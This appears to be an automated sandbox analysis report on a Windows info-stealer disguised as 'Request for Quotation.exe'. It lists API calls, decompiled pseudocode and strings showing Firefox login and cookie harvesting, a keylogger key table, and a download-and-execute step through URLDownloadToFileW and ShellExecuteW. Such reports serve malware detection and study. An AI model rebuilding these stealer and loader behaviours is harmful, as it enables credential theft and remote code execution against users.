                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 3375041920-3681987949
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                                                                • GetLastError.KERNEL32 ref: 00411442
                                                                                • malloc.MSVCRT ref: 00411458
                                                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                                                                • String ID:
                                                                                • API String ID: 2829549728-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 0040752D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                                                                • getenv.MSVCRT ref: 00407558
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                                                                  • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                                                                  • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 2907366228-432212279
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 16%
                                                                                			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                                                                				char _v5;
                                                                                				void* _v12;
                                                                                				char _v13;
                                                                                				char _v14;
                                                                                				void* _v32;
                                                                                				char _v48;
                                                                                				short _v64;
                                                                                				char _v80;
                                                                                				char _v96;
                                                                                				void* _v112;
                                                                                				char _v128;
                                                                                				char _v144;
                                                                                				struct _WIN32_FIND_DATAW _v736;
                                                                                				char* _t73;
                                                                                				struct _WIN32_FIND_DATAW* _t75;
                                                                                				void* _t79;
                                                                                				void* _t81;
                                                                                				signed int _t96;
                                                                                				intOrPtr* _t137;
                                                                                				void* _t139;
                                                                                				void* _t141;
                                                                                				signed int _t145;
                                                                                
                                                                                				_t137 = __ecx;
                                                                                				_t60 =  &_v5;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                                                                				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                                                                				L00414146();
                                                                                				_t141 = _t139 + 0x1c;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                                                                				_v12 = FindFirstFileW( &_v64,  &_v64);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				if(_v12 == 0xffffffff) {
                                                                                					L11:
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					return 1;
                                                                                				}
                                                                                				while(FindNextFileW(_v12,  &_v736) != 0) {
                                                                                					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                                                                						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                                                                						L0041414C();
                                                                                						L00414152();
                                                                                						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                                                                						_t141 = _t141 + 0x18;
                                                                                						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                                                                						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                                                                						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					}
                                                                                					_t71 =  &(_v736.cFileName);
                                                                                					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                                                                					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                                                                					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                                                                					_t141 = _t141 + 0x10;
                                                                                					_t73 =  &_a20;
                                                                                					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                                                                					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                                                                						L8:
                                                                                						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                						continue;
                                                                                					} else {
                                                                                						_t75 =  &_v736;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                                                                						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						_t145 = _t141 - 0x10;
                                                                                						_t96 = _t145;
                                                                                						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                                                                						_t80 =  &_v96;
                                                                                						L00414140();
                                                                                						L00414140();
                                                                                						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
                                                                                						_t141 = _t145 + 0x30;
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                                                                							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                							return 0;
                                                                                						}
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				FindClose(_v12);
                                                                                				goto L11;
                                                                                 			}

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,00018426), ref: 00404C1F
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,00018426), ref: 00404C2F
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C39
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C43
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                                                                • wcscmp.MSVCRT ref: 00404CCA
                                                                                • wcscmp.MSVCRT ref: 00404CE2
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,?,?), ref: 00404D7C
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                                                                • String ID:
                                                                                • API String ID: 1504175218-0
                                                                                • Opcode ID: 46ead55cb45668728e11acff74b5d39d496273f5026c6432a1d87f7a2836c74c
                                                                                • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                                                                • Opcode Fuzzy Hash: 46ead55cb45668728e11acff74b5d39d496273f5026c6432a1d87f7a2836c74c
                                                                                • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                                                • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                                                                • API String ID: 4257247948-3968991301
                                                                                • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                                                                • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                                                                • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                                                                • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                                                                • free.MSVCRT(?,C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040D643
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                • open, xrefs: 0040D5BA
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040D636
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
